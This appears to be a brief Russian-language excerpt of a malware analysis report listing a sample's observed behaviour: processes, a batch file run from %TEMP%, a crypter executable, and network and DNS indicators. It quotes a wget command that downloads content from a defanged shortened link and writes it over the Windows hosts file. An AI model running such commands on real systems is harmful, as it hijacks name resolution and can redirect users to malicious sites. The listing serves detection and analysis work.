Техническая информация
- <Текущая директория>\wget.exe http://bi#.ly/ezooCi --output-document=<DRIVERS>\etc\hosts
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\EmotionCard.bat" "
- <Текущая директория>\crypter.exe
- <Текущая директория>\wget.exe
- %TEMP%\1.tmp\EmotionCard.bat
- 'bi#.ly':80
- bi#.ly/ezooCi
- DNS ASK bi#.ly